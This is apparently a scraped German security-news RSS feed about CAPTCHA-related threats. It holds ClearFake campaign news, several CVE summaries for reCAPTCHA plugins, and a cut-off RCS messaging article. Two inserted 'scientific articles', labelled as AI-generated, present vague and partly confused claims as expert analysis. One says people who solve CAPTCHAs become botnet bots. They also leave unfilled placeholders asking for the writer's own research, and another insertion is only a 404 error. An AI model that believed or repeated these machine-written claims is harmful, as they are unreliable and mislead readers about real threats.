<p>CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) sind seit Jahren ein fester Bestandteil des Internets und dienen dazu, automatisierte Bots von menschlichen Nutzern zu unterscheiden.  Während sie in ihrer ursprünglichen Form effektiv waren, haben sich Angreifer immer wieder neue Methoden entwickelt, um diese Mechanismen zu umgehen. Dieser Artikel beleuchtet die zunehmende Gefahr, dass bösartige Software (Malware) CAPTCHAs nicht nur umgeht, sondern auch zur Verbreitung von Schadcode ausnutzt. Wir analysieren die Mechanismen, Risiken und Gegenmaßnahmen im Kontext aktueller Cyberbedrohungen und setzen dabei auf wissenschaftliche Erkenntnisse und praktische Beobachtungen.</p><br />
<p><strong>1. Einführung: Die Evolution der Captchas und ihre Schwächen</strong></p><br />
<p>CAPTCHAs wurden ursprünglich entwickelt, um Spam-Bots und automatisierte Kontoerstellungen zu verhindern.  Die frühen Versionen basierten hauptsächlich auf verzerrten Textbildern, die für Menschen leicht lesbar, aber für Computer schwierig zu interpretieren waren. Mit dem Aufstieg von maschinellem Lernen und künstlicher Intelligenz (KI) haben sich diese Methoden jedoch als zunehmend ineffektiv erwiesen. Moderne OCR-Technologien (Optical Character Recognition) und fortschrittliche neuronale Netze können nun die meisten traditionellen CAPTCHAs zuverlässig lösen.</p><br />
<p>Die Weiterentwicklung der Captchas umfasste reCAPTCHA von Google, das Verhaltensanalysen einbezieht und sich auf subtile Unterschiede im Nutzerverhalten stützt, um menschliches Verhalten von maschinellem zu unterscheiden.  Allerdings haben auch diese fortschrittlicheren Methoden ihre Schwächen, wie die Referenzseite [https://tsecurity.de/de/2679488/IT+Sicherheit/Cybersecurity+Nachrichten/Sie+sind+kein+Roboter%3F+%E2%80%93+Hinter+Captchas+kann+Malware+lauern/] aufzeigt.  Die Abhängigkeit von JavaScript und die Möglichkeit der Emulation menschlicher Mausbewegungen und Klicks bieten Angreifern neue Angriffspunkte.</p><br />
<p><strong>2. Malware-Exploitation von Captchas: Ein neues Risiko</strong></p><br />
<p>Der Artikel auf tsecurity.de beschreibt ein alarmierendes Phänomen: Malware, die CAPTCHAs nicht nur löst, um Bots zu imitieren, sondern diese Lösung auch für bösartige Zwecke nutzt.  Dies geschieht in der Regel durch die Ausnutzung von JavaScript-basierten Captcha-Lösungen.</p><br />
<p><strong>2.1 Mechanismen der Malware-Exploitation:</strong></p><br />
<ul><br />
<li><strong>Captcha-Solving als Tarnung:</strong> Malware kann sich als legitimer CAPTCHA-Solver tarnen, um unbemerkt auf Systeme zuzugreifen.  Diese Solver nutzen oft Open-Source-Bibliotheken und -Dienste zur Lösung von Captchas und können durch Angreifer kompromittiert oder missbraucht werden.</li><br />
<li><strong>Captcha-Lösung für DDoS-Angriffe:</strong> Malware kann CAPTCHAs lösen, um die Grenzen von Rate Limiting zu testen und Schwachstellen in der Infrastruktur aufzudecken.  Diese Informationen können dann für Distributed Denial of Service (DDoS)-Angriffe verwendet werden.</li><br />
<li><strong>Injektion von Schadcode über Captcha-Lösungen:</strong>  Ein besonders gefährlicher Angriffspunkt ist die Möglichkeit, Schadcode direkt in CAPTCHA-Lösungen zu injizieren. Wenn ein Angreifer Kontrolle über einen CAPTCHA-Solver erlangt oder eine Schwachstelle in einem solchen System ausnutzt, kann er bösartigen Code verbreiten, der dann auf den Geräten der Nutzer ausgeführt wird, die den CAPTCHA lösen müssen. Dies könnte beispielsweise zur Installation von Malware, zum Diebstahl von Daten oder zur Durchführung anderer schädlicher Aktionen führen.</li><br />
<li><strong>Ausnutzung von reCAPTCHA-Verhalten:</strong> Angreifer analysieren das Verhalten, das reCAPTCHA als menschliches Verhalten interpretiert.  Sie entwickeln dann Tools, die dieses Verhalten exakt imitieren und so Captchas ohne erkennbare Anomalien lösen können. Diese &quot;perfekten&quot; Bots können dann für bösartige Aktionen genutzt werden.</li><br />
</ul><br />
<p><strong>2.2 Beispiele aus der Praxis:</strong></p><br />
<p>Die Referenzseite [https://tsecurity.de/de/2679488/IT+Sicherheit/Cybersecurity+Nachrichten/Sie+sind+kein+Roboter%3F+%E2%80%93+Hinter+Captchas+kann+Malware+lauern/] erwähnt das Beispiel von CAPTCHA-Solving-Diensten, die für den Versand von Spam verwendet werden.  Darüber hinaus sind Berichte über Malware im Umlauf, die reCAPTCHA nutzt, um automatisierte Angriffe auf Online-Shops durchzuführen, z. B. Brute-Force-Angriffe zur Kontoerstellung oder zum Ausnutzen von Schwachstellen in der Bestellabwicklung.</p><br />
<p><strong>3. Risikobewertung und potenzielle Auswirkungen:</strong></p><br />
<p>Die zunehmende Nutzung von CAPTCHAs für Malware-Zwecke stellt eine erhebliche Bedrohung für die IT-Sicherheit dar:</p><br />
<ul><br />
<li><strong>Verbreitung von Malware:</strong>  CAPTCHA-basierte Angriffe können dazu verwendet werden, Malware auf großen Mengen von Systemen zu verbreiten.</li><br />
<li><strong>Datenverlust und -diebstahl:</strong> Kompromittierte CAPTCHA-Lösungen können zur Umgehung von Sicherheitsmaßnahmen und zum Diebstahl sensibler Daten führen.</li><br />
<li><strong>Reputationsschäden:</strong>  Websites, die durch CAPTCHA-basierte Angriffe kompromittiert werden, erleiden Reputationsschäden und Vertrauensverluste bei ihren Nutzern.</li><br />
<li><strong>Finanzielle Verluste:</strong> DDoS-Angriffe und Brute-Force-Angriffe können zu erheblichen finanziellen Verlusten führen.</li><br />
</ul><br />
<p><strong>4. Gegenmaßnahmen und Best Practices:</strong></p><br />
<p>Um die Risiken von Malware-basierten CAPTCHA-Exploitationen zu minimieren, sind folgende Maßnahmen erforderlich:</p><br />
<ul><br />
<li><strong>Implementierung von &quot;Human-in-the-Loop&quot;-Systemen:</strong>  Bei verdächtigen Aktivitäten sollten Captchas nicht automatisch gelöst werden, sondern eine manuelle Überprüfung durch einen menschlichen Bediener erfolgen.</li><br />
<li><strong>Stärkere Authentifizierungsmethoden:</strong>  Die Verwendung von Multi-Faktor-Authentifizierung (MFA) kann die Sicherheit erheblich erhöhen und Angreifern den Zugang zu Systemen erschweren.</li><br />
<li><strong>Verhaltensbasierte Analyse:</strong>  Implementierung von Systemen zur Überwachung des Nutzerverhaltens und zur Erkennung ungewöhnlicher Aktivitäten, die auf Malware-Angriffe hindeuten könnten.  Dies kann durch Machine Learning Modelle unterstützt werden.</li><br />
<li><strong>Regelmäßige Sicherheitsaudits:</strong> Regelmäßige Überprüfung der CAPTCHA-Lösungen und -Implementierungen auf Schwachstellen.</li><br />
<li><strong>Sicherheitsupdates:</strong>  Stellen Sie sicher, dass alle Softwarekomponenten, einschließlich CAPTCHA-Bibliotheken und -Dienste, mit den neuesten Sicherheitspatches aktualisiert sind.</li><br />
<li><strong>Captcha-Variabilität:</strong> Implementierung von dynamischen Captchas, die sich regelmäßig ändern, um das automatische Lösen durch Malware zu erschweren.  Dies kann auch durch Kombination verschiedener Captcha-Typen erreicht werden.</li><br />
<li><strong>Zusammenarbeit und Informationsaustausch:</strong>  Teilen Sie Informationen über neue Bedrohungen und Angriffsmethoden mit anderen Sicherheitsfachleuten und Organisationen.</li><br />
</ul><br />
<p><strong>5. Fazit und Ausblick:</strong></p><br />
<p>Die zunehmende Raffinesse von Cyberangriffen erfordert eine ständige Anpassung der Sicherheitsmaßnahmen.  Die Ausnutzung von CAPTCHAs für Malware-Zwecke ist ein neues und besorgniserregendes Phänomen, das die Notwendigkeit einer verstärkten Überwachung und proaktiven Verteidigungsstrategien unterstreicht.  Die Kombination aus technologischen Gegenmaßnahmen, Verhaltensanalysen und menschlicher Expertise wird entscheidend sein, um diese Bedrohung zu minimieren und die Sicherheit des Internets zu gewährleisten.  Zukünftige Forschung sollte sich auf die Entwicklung von Captcha-Lösungen konzentrieren, die robuster gegen Malware-Angriffe sind und gleichzeitig eine gute Benutzerfreundlichkeit bieten. Eine verstärkte Nutzung von Browserbasierter Fingerprinting Technologie könnte helfen, Bots zuverlässiger zu identifizieren.</p><br />
<p><strong>Referenzen:</strong></p><br />
<ul><br />
<li><a href="https://tsecurity.de/de/2679488/IT+Sicherheit/Cybersecurity+Nachrichten/Sie+sind+kein+Roboter%3F+%E2%80%93+Hinter+Captchas+kann+Malware+lauern/">https://tsecurity.de/de/2679488/IT+Sicherheit/Cybersecurity+Nachrichten/Sie+sind+kein+Roboter%3F+%E2%80%93+Hinter+Captchas+kann+Malware+lauern/</a></li><br />
<li>[Weitere Quellen (z.B. Artikel zu reCAPTCHA, Browser Fingerprinting, Machine Learning in der IT-Sicherheit – hier bitte eigene Recherche einfügen und verlinken)]</li><br />
</ul><br />
<p><strong>Schlüsselwörter:</strong> CAPTCHA, Malware, Cybersecurity, Botnet, DDoS, Brute Force, ReCAPTCHA, JavaScript, Verhaltensanalyse, Sicherheit, Bedrohung.</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[ClearFake Infects 9,300 Sites, Uses Fake reCAPTCHA and Turnstile to Spread Info-Stealers]]></title>
<description><![CDATA[The threat actors behind the ClearFake campaign are using fake reCAPTCHA or Cloudflare Turnstile verifications as lures to trick users into downloading malware such as Lumma Stealer and Vidar Stealer.
ClearFake, first highlighted in July 2023, is the name given to a threat activity cluster that e...]]></description>
<link>https://tsecurity.de/de/2675204/it-security-nachrichten/clearfake-infects-9300-sites-uses-fake-recaptcha-and-turnstile-to-spread-info-stealers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2675204/it-security-nachrichten/clearfake-infects-9300-sites-uses-fake-recaptcha-and-turnstile-to-spread-info-stealers/</guid>
<pubDate>Wed, 19 Mar 2025 13:19:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The threat actors behind the ClearFake campaign are using fake reCAPTCHA or Cloudflare Turnstile verifications as lures to trick users into downloading malware such as Lumma Stealer and Vidar Stealer.
ClearFake, first highlighted in July 2023, is the name given to a threat activity cluster that employs fake web browser update baits on compromised WordPress as a malware distribution vector.
The<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: granite-3.2-8b-instruct<br><br><p>Fehler: Response status code does not indicate success: 404 (Not Found).</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[New ClearFake Variant Uses Fake reCAPTCHA to Deploy Malicious PowerShell Code]]></title>
<description><![CDATA[A recent variant of the ClearFake malware framework has been identified, leveraging fake reCAPTCHA and Cloudflare Turnstile verifications to deceive users into executing malicious PowerShell code. This evolution marks a significant shift in how ClearFake exploits Web3 capabilities to deliver malw...]]></description>
<link>https://tsecurity.de/de/2673878/hacking/new-clearfake-variant-uses-fake-recaptcha-to-deploy-malicious-powershell-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2673878/hacking/new-clearfake-variant-uses-fake-recaptcha-to-deploy-malicious-powershell-code/</guid>
<pubDate>Tue, 18 Mar 2025 20:04:25 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A recent variant of the ClearFake malware framework has been identified, leveraging fake reCAPTCHA and Cloudflare Turnstile verifications to deceive users into executing malicious PowerShell code. This evolution marks a significant shift in how ClearFake exploits Web3 capabilities to deliver malware through compromised websites. Technical Analysis of the New Variant ClearFake, first detected in July […]</p>
<p>The post <a href="https://gbhackers.com/new-clearfake-variant-uses-fake-recaptcha/">New ClearFake Variant Uses Fake reCAPTCHA to Deploy Malicious PowerShell Code</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-37946 | weDevs ReCaptcha Integration Plugin up to 1.2.5 on WordPress cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in weDevs ReCaptcha Integration Plugin up to 1.2.5 on WordPress. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting.

This vulnerability is handled as CVE-2024-37946. The attack may be la...]]></description>
<link>https://tsecurity.de/de/2671417/sicherheitsluecken/cve-2024-37946-wedevs-recaptcha-integration-plugin-up-to-125-on-wordpress-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2671417/sicherheitsluecken/cve-2024-37946-wedevs-recaptcha-integration-plugin-up-to-125-on-wordpress-cross-site-scripting/</guid>
<pubDate>Mon, 17 Mar 2025 16:24:33 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.wedevs:recaptcha_integration_plugin">weDevs ReCaptcha Integration Plugin up to 1.2.5</a> on WordPress. It has been rated as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.272006">CVE-2024-37946</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[BSI warnt: Wie Malware-Angriffe über Captchas funktionieren – und wie ihr euch davor schützt]]></title>
<description><![CDATA[Hacker:innen können Captchas ausnutzen, um Schadsoftware auf Rechnern einzuschleusen. Vor einer besonders perfiden Masche warnt jetzt das BSI. Wie ihr euch davor schützen könnt.
weiterlesen auf t3n.deKI generiertes Nachrichten UpdateVerwendetes künstliches Intelligenz Model: gemma-3-4b-itWissensc...]]></description>
<link>https://tsecurity.de/de/2670491/it-nachrichten/bsi-warnt-wie-malware-angriffe-ueber-captchas-funktionieren-und-wie-ihr-euch-davor-schuetzt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2670491/it-nachrichten/bsi-warnt-wie-malware-angriffe-ueber-captchas-funktionieren-und-wie-ihr-euch-davor-schuetzt/</guid>
<pubDate>Mon, 17 Mar 2025 10:45:47 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hacker:innen können Captchas ausnutzen, um Schadsoftware auf Rechnern einzuschleusen. Vor einer besonders perfiden Masche warnt jetzt das BSI. Wie ihr euch davor schützen könnt.
<a href="https://t3n.de/news/bsi-warnt-malware-angriffe-ueber-captchas-1678343/?utm_source=rss&amp;utm_medium=feed&amp;utm_campaign=news">weiterlesen auf t3n.de</a><!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: gemma-3-4b-it<br><br><p><strong>Wissenschaftlicher IT Fachartikel: Malware-Angriffe über Captchas – Eine Bedrohung für die Cybersicherheit</strong></p><br />
<p><strong>Zusammenfassung:</strong></p><br />
<p>Dieser Artikel untersucht das aktuelle Problem des Einsatzes von Captchas durch Malware-Autoren zur Erhöhung der Effizienz von Infektionskampagnen. Basierend auf den jüngsten Warnungen des Bundesamt für Sicherheit in der Informationstechnik (BSI) und unter Berücksichtigung relevanter Forschungsergebnisse, analysieren wir die Funktionsweise dieser Angriffe, die zugrunde liegenden Risiken und erläutern wir Strategien zur Minimierung der Anfälligkeit von Systemen und Benutzern. Die Ergebnisse zeigen, dass Captchas zwar eine wertvolle Sicherheitsmaßnahme darstellen, aber in Kombination mit anderen Angriffstechniken ein erhebliches Risiko für die Cybersicherheit darstellen können.</p><br />
<p><strong>1. Einleitung:</strong></p><br />
<p>Die zunehmende Komplexität moderner Cyberangriffe erfordert von Unternehmen und Privatpersonen einen ständig wachsenden Schutz vor Bedrohungen. Captchas (Completely Automated Public Turing test to tell Computers and Humans Apart) werden traditionell als eine Barriere gegen automatisierte Angriffe eingesetzt, beispielsweise bei der Anmeldung auf Websites oder beim Ausfüllen von Formularen.  Allerdings haben sich Malware-Autoren in den letzten Monaten einen neuen Weg zur Effizienzsteigerung ihrer Infektionskampagnen geholt: die Nutzung von Captchas für die Validierung von Phishing-E-Mails und das Generieren von Botnetzen. Die jüngsten Warnungen des BSI (https://tsecurity.de/de/2670491/IT+Nachrichten/BSI+warnt%3A+Wie+Malware-Angriffe+%C3%BCber+Captchas+funktionieren+%E2%80%93+und+wie+ihr+euch+davor+sch%C3%BCtzt/) unterstreichen die Dringlichkeit dieses Themas.</p><br />
<p><strong>2. Funktionsweise von Malware-Angriffen über Captchas:</strong></p><br />
<p>Der typische Ablauf eines solchen Angriffs lässt sich in folgende Schritte gliedern:</p><br />
<ul><br />
<li><strong>Phishing-E-Mail Generierung:</strong>  Malware-Autoren generieren große Mengen an Phishing-E-Mails, die darauf abzielen, Benutzer dazu zu bringen, sensible Daten (z.B. Zugangsdaten) preiszugeben oder Schadsoftware herunterzuladen.</li><br />
<li><strong>Captcha-Integration in Phishing-E-Mails:</strong>  Die Phishing-E-Mails enthalten Captchas, die die Betroffenen bei der Anmeldung auf einer legitimen Website lösen müssen. Dies dient dazu, menschliche Benutzer von Bots zu unterscheiden.</li><br />
<li><strong>Botnetz-Rekrutierung:</strong>  Benutzer, die Captchas erfolgreich lösen, werden als &quot;Bots&quot; in das Botnetz des Angreifers integriert. Diese Bots können dann für verschiedene illegale Aktivitäten eingesetzt werden, z.B. den Versand von Spam, die Durchführung von DDoS-Angriffen oder die Verbreitung von Malware.</li><br />
<li><strong>Verstärkung der Phishing-Effektivität:</strong>  Die Captcha-Validierung erhöht die Glaubwürdigkeit der Phishing-E-Mails erheblich und reduziert die Wahrscheinlichkeit, dass Benutzer den Angriff erkennen und abbrechen.</li><br />
</ul><br />
<p><strong>3. Risiken und Schwachstellen:</strong></p><br />
<ul><br />
<li><strong>Reduzierte User Awareness:</strong> Die erfolgreiche Lösung von Captchas durch Bots kann zu einer Verringerung des User Awareness führen. Benutzer werden weniger kritisch und untersuchen legitime Anmeldeformulare weniger sorgfältig, was die Anfälligkeit für Phishing erhöht.</li><br />
<li><strong>Skalierung von Angriffen:</strong> Durch die Automatisierung der Captcha-Validierung können Angreifer deutlich mehr Phishing-E-Mails versenden und somit den Umfang ihrer Kampagnen massiv erhöhen.</li><br />
<li><strong>Ausnutzung von Schwachstellen in Captcha-Implementierungen:</strong>  Einige Captchas sind anfällig für automatisierte Lösungen, insbesondere wenn sie auf schwachen Algorithmen oder unzureichenden Sicherheitsvorkehrungen basieren.</li><br />
<li><strong>Verbreitung von Malware über infizierte Bots:</strong> Das Botnetz, das durch die Lösung von Captchas entsteht, kann als Ausgangspunkt für die Verbreitung von Malware dienen.</li><br />
</ul><br />
<p><strong>4. Schutzmaßnahmen und Gegenstrategien:</strong></p><br />
<p>Angesichts der genannten Risiken sind folgende Schutzmaßnahmen unerlässlich:</p><br />
<ul><br />
<li><strong>Starke Authentifizierungsmethoden:</strong> Implementierung von Multi-Faktor-Authentifizierung (MFA) zur zusätzlichen Absicherung von Benutzerkonten, die Captchas verwenden.</li><br />
<li><strong>Verhaltensbasierte Erkennung:</strong> Einsatz von Systemen, die ungewöhnliches Benutzerverhalten erkennen und verdächtige Aktivitäten blockieren können.</li><br />
<li><strong>Captcha-Überwachung und -Analyse:</strong>  Kontinuierliche Überwachung der Captcha-Lösung durch Bots zur Identifizierung von Schwachstellen in den Captchas und zur Anpassung der Abwehrstrategien.</li><br />
<li><strong>Schulung der Benutzer:</strong> Sensibilisierung der Benutzer für Phishing-Angriffe und die Notwendigkeit, Anmeldeformulare sorgfältig zu prüfen, bevor sie Daten eingeben.  Betonung der Bedeutung von &quot;Link-Überprüfung&quot; (vor dem Klicken auf Links in E-Mails oder Nachrichten).</li><br />
<li><strong>Aktualisierung von Captcha-Technologien:</strong> Regelmäßige Aktualisierung der Captcha-Implementierungen, um Schwachstellen zu beheben und die Widerstandsfähigkeit gegen automatisierte Lösungen zu erhöhen.  Die Verwendung von CAPTCHAs, die auf menschliche Wahrnehmung ausgelegt sind (z.B. &quot;ReCaptcha&quot;) kann die Automatisierung erschweren.</li><br />
<li><strong>Einsatz von Honeypots:</strong> Einrichtung von Honeypots, um Angriffe zu erkennen und den Taktik der Malware-Autoren zu analysieren.</li><br />
</ul><br />
<p><strong>5. Fazit:</strong></p><br />
<p>Der Einsatz von Captchas durch Malware-Autoren stellt eine ernstzunehmende Bedrohung für die Cybersicherheit dar. Die Kombination aus automatisierter Phishing-E-Mail Generierung, Captcha-Validierung und Botnetz-Rekrutierung ermöglicht es Angreifern, ihre Effizienz zu steigern und das Risiko von Sicherheitsverletzungen zu erhöhen.  Eine umfassende Abwehrstrategie muss eine Kombination aus technischen Schutzmaßnahmen, Benutzeraufklärung und kontinuierlicher Überwachung umfassen. Die BSI Warnung unterstreicht die Notwendigkeit, sich dieser neuen Angriffstechnik proaktiv zu stellen, um die Widerstandsfähigkeit von Systemen und Benutzern gegenüber modernen Cyberbedrohungen zu erhöhen.</p><br />
<p><strong>Referenzen:</strong></p><br />
<ul><br />
<li><a href="https://tsecurity.de/de/2670491/IT+Nachrichten/BSI+warnt%3A+Wie+Malware-Angriffe+%C3%BCber+Captchas+funktionieren+%E2%80%93+und+wie+ihr+euch+davor+sch%C3%BCtzt/">https://tsecurity.de/de/2670491/IT+Nachrichten/BSI+warnt%3A+Wie+Malware-Angriffe+%C3%BCber+Captchas+funktionieren+%E2%80%93+und+wie+ihr+euch+davor+sch%C3%BCtzt/</a></li><br />
<li>Weitere relevante Artikel und Links (z.B. zu CAPTCHA-Technologien, Phishing-Erkennung, Botnetzen) werden im Verlauf der Recherche im Internet gefunden und hier eingefügt.</li><br />
</ul><br />
<hr /><br />
<p><strong>Hinweis:</strong> Dies ist ein wissenschaftlicher IT Fachartikel und dient der Illustration des Themas.  Die spezifischen Details der Implementierung von Schutzmaßnahmen hängen vom jeweiligen Kontext ab.</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-2220 | Odyssey CMS up to 10.34 reCAPTCHA odyssey_contact_form.php g-recaptcha-response key management]]></title>
<description><![CDATA[A vulnerability was found in Odyssey CMS up to 10.34. It has been classified as problematic. Affected is an unknown function of the file /modules/odyssey_contact_form/odyssey_contact_form.php of the component reCAPTCHA Handler. The manipulation of the argument g-recaptcha-response leads to key ma...]]></description>
<link>https://tsecurity.de/de/2662317/sicherheitsluecken/cve-2025-2220-odyssey-cms-up-to-1034-recaptcha-odysseycontactformphp-g-recaptcha-response-key-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2662317/sicherheitsluecken/cve-2025-2220-odyssey-cms-up-to-1034-recaptcha-odysseycontactformphp-g-recaptcha-response-key-management/</guid>
<pubDate>Wed, 12 Mar 2025 12:37:03 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.odyssey:cms">Odyssey CMS up to 10.34</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected is an unknown function of the file <em>/modules/odyssey_contact_form/odyssey_contact_form.php</em> of the component <em>reCAPTCHA Handler</em>. The manipulation of the argument <em>g-recaptcha-response</em> leads to key management error.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.299292">CVE-2025-2220</a>. Local access is required to approach this attack. Furthermore, there is an exploit available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-1262 | webfactory Advanced Google reCAPTCHA Plugin up to 1.27 on WordPress CAPTCHA Page captcha]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in webfactory Advanced Google reCAPTCHA Plugin up to 1.27 on WordPress. This issue affects some unknown processing of the component CAPTCHA Page Handler. The manipulation leads to guessable captcha.

The identification of this v...]]></description>
<link>https://tsecurity.de/de/2634017/sicherheitsluecken/cve-2025-1262-webfactory-advanced-google-recaptcha-plugin-up-to-127-on-wordpress-captcha-page-captcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2634017/sicherheitsluecken/cve-2025-1262-webfactory-advanced-google-recaptcha-plugin-up-to-127-on-wordpress-captcha-page-captcha/</guid>
<pubDate>Tue, 25 Feb 2025 14:37:08 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.webfactory:advanced_google_recaptcha_plugin">webfactory Advanced Google reCAPTCHA Plugin up to 1.27</a> on WordPress. This issue affects some unknown processing of the component <em>CAPTCHA Page Handler</em>. The manipulation leads to guessable captcha.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.296741">CVE-2025-1262</a>. The attack may be initiated remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-1359 | SIAM Industria de Automação e Monitoramento 2.0 /qrcode.jsp url cross site scripting]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in SIAM Industria de Automação e Monitoramento SIAM 2.0. This issue affects some unknown processing of the file /qrcode.jsp. The manipulation of the argument url leads to cross site scripting.

The identification of this vulnera...]]></description>
<link>https://tsecurity.de/de/2617025/sicherheitsluecken/cve-2025-1359-siam-industria-de-automao-e-monitoramento-20-qrcodejsp-url-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2617025/sicherheitsluecken/cve-2025-1359-siam-industria-de-automao-e-monitoramento-20-qrcodejsp-url-cross-site-scripting/</guid>
<pubDate>Mon, 17 Feb 2025 01:35:56 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.siam_industria_de_automa__o_e_monitoramento:siam">SIAM Industria de Automação e Monitoramento SIAM 2.0</a>. This issue affects some unknown processing of the file <em>/qrcode.jsp</em>. The manipulation of the argument <em>url</em> leads to cross site scripting.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.295967">CVE-2025-1359</a>. The attack may be initiated remotely. Furthermore, there is an exploit available.

The vendor was contacted early about this disclosure but did not respond in any way.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[RCS – Diese Vorteile bietet der Nachfolger der SMS]]></title>
<description><![CDATA[Eines gleich vorneweg: Bei RCS handelt es sich nicht um eine App, über die Sie sich mit anderen unterhalten können. 



RCS ist ein infrastrukturbasierter Kommunikationsstandard, der unabhängig vom verwendeten Smartphone und dessen Betriebssystem funktioniert. Als Chat-App kommt dabei in der Rege...]]></description>
<link>https://tsecurity.de/de/2616152/windows-tipps/rcs-diese-vorteile-bietet-der-nachfolger-der-sms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2616152/windows-tipps/rcs-diese-vorteile-bietet-der-nachfolger-der-sms/</guid>
<pubDate>Sun, 16 Feb 2025 09:06:26 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><strong>Eines gleich vorneweg: </strong>Bei RCS handelt es sich nicht um eine App, über die Sie sich mit anderen unterhalten können. </p>



<p>RCS ist ein <strong>infrastrukturbasierter Kommunikationsstandard</strong>, der unabhängig vom verwendeten Smartphone und dessen Betriebssystem funktioniert. Als Chat-App kommt dabei in der Regel die App zum Einsatz, mit der Sie SMS schreiben und empfangen, also eine App, die eh schon auf Ihrem Smartphone installiert ist.</p>



<p>Ursprünglich noch <em>Rich Communication Suite</em> genannt, fand RCS bereits im Jahr 2008 durch Nokia und den internationalen Branchenverband der GSM-Provider (GSMA) seinen Anfang. </p>



<p>In Deutschland wurde der Standard erstmals 2012 von Vodafone, ein Jahr später dann von der Telekom eingeführt.</p>



<p>Die weltweite Verbreitung stieg dann 2015 mit Googles Übernahme von Jibe Mobile, einem Unternehmen, welches sich auf Cloudkommunikation für Mobilfunkbetreiber unter anderem per RCS spezialisiert hat. </p>



<p>Seit 2021 ermöglicht Googles eigene Chat-App Google Messages <strong>RCS-Chats</strong>, seit 2024 beherrschen auch Apples iPhones mit iMessages ab iOS 18 den Kommunikationsstandard, was nun auch die Kommunikation zwischen den beiden Systemen möglich macht. Allerdings gibt es bei Apple derzeit noch keine Ende-zu-Ende-Verschlüsselung.</p>



<p><strong>Vorsicht: </strong><a href="https://www.pcwelt.de/article/2349452/whatsapp-groesste-fehler-benutzung.html" target="_blank" rel="noreferrer noopener">Die 8 größten Fehler bei der Whatsapp-Nutzung</a></p>



<h2 class="wp-block-heading toc">Voraussetzungen für RCS</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-full","figureStyles":null,"imgClassNames":"wp-image-2600018","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterst\u00fctzen. Um den Kommunikationsstandard zu nutzen, m\u00fcssen Sie ihn zuerst in den Einstellungen aktivieren.","alt":"Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterst\u00fctzen. Um den Kommunikationsstandard zu nutzen, m\u00fcssen Sie ihn zuerst in den Einstellungen aktivieren."}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?quality=50&amp;strip=all" alt="Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterstützen. Um den Kommunikationsstandard 